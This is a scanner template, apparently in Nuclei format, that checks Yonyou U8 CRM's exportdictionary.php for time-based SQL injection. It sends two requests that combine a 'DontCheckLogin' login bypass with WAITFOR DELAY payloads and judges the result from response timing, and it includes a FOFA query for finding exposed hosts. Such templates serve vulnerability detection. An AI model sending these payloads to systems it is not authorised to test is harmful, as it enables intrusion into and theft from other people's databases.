id: yongyouU8-CRM-exportdictionary_php-sql

info:
  name: 用友U8 CRM exportdictionary.php SQL延时注入漏洞
  author: yongyouU8
  severity: high
  metadata: 
    fofa-query: body="用友U8CRM"
  tags: yongyon,u8,crm,sql


http:
  - raw:
      - |
        GET /devtools/tools/exportdictionary.php?DontCheckLogin=1&value=1%27;WAITFOR+DELAY+%270:0:4%27-- HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
        Cookie: PHPSESSID=bgsesstimeout-;

      - |
        GET /devtools/tools/exportdictionary.php?DontCheckLogin=1&value=1%27;WAITFOR+DELAY+%270:0:8%27-- HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
        Cookie: PHPSESSID=bgsesstimeout-;

    matchers:
      - type: dsl
        dsl:
          - 'duration_1>=4 && duration_1<=5'  
          - 'duration_2>=8 && duration_2<=9'
        condition: and



